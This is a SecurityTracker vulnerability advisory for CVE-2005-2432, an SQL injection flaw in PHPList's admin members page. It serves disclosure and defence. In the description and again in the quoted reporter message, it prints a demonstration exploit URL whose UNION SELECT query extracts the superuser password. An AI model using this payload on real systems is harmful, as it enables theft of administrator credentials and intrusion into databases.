SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PHPlist Vendors:   phplist.com
PHPList Input Validation Flaw in 'id' Parameter Lets Remote Authenticated Users Inject SQL Commands
SecurityTracker Alert ID:  1014607
SecurityTracker URL:  http://securitytracker.com/id/1014607
CVE Reference:   CVE-2005-2432   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 1 2005
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in PHPList. A remote authenticated user can inject SQL commands.

The software does not properly validate user-supplied input. A remote authenticated user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

A demonstration exploit URL is provided:

http://[target]/lists/admin/?page=members&id=1%20union%20select
%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password

ziot at whataboutpp.com reported this vulnerability.

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phplist.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PHPList Vunerability

http://example.com/lists/admin/?page=members&id=1%20union%20select%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password

Although not completely open because one must authenticate, but completely leaves the database open.. thus being a SQL Injection hole.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC